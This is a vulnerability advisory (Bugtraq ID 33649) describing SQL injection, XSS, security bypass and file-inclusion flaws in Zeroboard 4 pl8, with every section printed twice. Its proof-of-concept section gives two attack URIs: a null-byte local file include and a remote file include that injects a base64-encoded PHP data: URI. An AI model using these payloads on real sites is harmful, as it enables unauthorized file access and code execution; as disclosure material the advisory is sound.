Zeroboard Multiple Remote Vulnerabilities
BID:33649
Info
Zeroboard Multiple Remote Vulnerabilities
| Bugtraq ID: | 33649 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 06 2009 12:00AM |
| Updated: | Feb 09 2009 08:58PM |
| Credit: | make0day |
| Vulnerable: |
Zeroboard Zeroboard 4 pl8 |
| Not Vulnerable: | |
Discussion
Zeroboard Multiple Remote Vulnerabilities
Zeroboard is prone to multiple vulnerabilities, including multiple SQL-injection issues, multiple security-bypass issues, a cross-site scripting issue, and local and remote file-include issues.
Successful exploits may allow attackers to:
- access or modify data
- exploit latent vulnerabilities in the underlying database
- obtain sensitive information
- execute arbitrary script code in the context of the webserver
- execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site
- bypass certain security restrictions
A successful attack will compromise the application and may help in further attacks.
The issues affect Zeroboard 4 pl8; other versions may also be vulnerable.
Zeroboard is prone to multiple vulnerabilities, including multiple SQL-injection issues, multiple security-bypass issues, a cross-site scripting issue, and local and remote file-include issues.
Successful exploits may allow attackers to:
- access or modify data
- exploit latent vulnerabilities in the underlying database
- obtain sensitive information
- execute arbitrary script code in the context of the webserver
- execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site
- bypass certain security restrictions
A successful attack will compromise the application and may help in further attacks.
The issues affect Zeroboard 4 pl8; other versions may also be vulnerable.
Exploit / POC
Zeroboard Multiple Remote Vulnerabilities
An attacker can exploit these issues through a browser.
The following example URIs are available:
For the local file-include issue:
http://www.example.com/include/write.php?dir=C:/Apache/htdocs/bbs/data/board1/make0day.txt%00
For the remote file-include issue:
http://www.example.com/include/print_category.php??setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=
An attacker can exploit these issues through a browser.
The following example URIs are available:
For the local file-include issue:
http://www.example.com/include/write.php?dir=C:/Apache/htdocs/bbs/data/board1/make0day.txt%00
For the remote file-include issue:
http://www.example.com/include/print_category.php??setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=
Solution / Fix
Zeroboard Multiple Remote Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].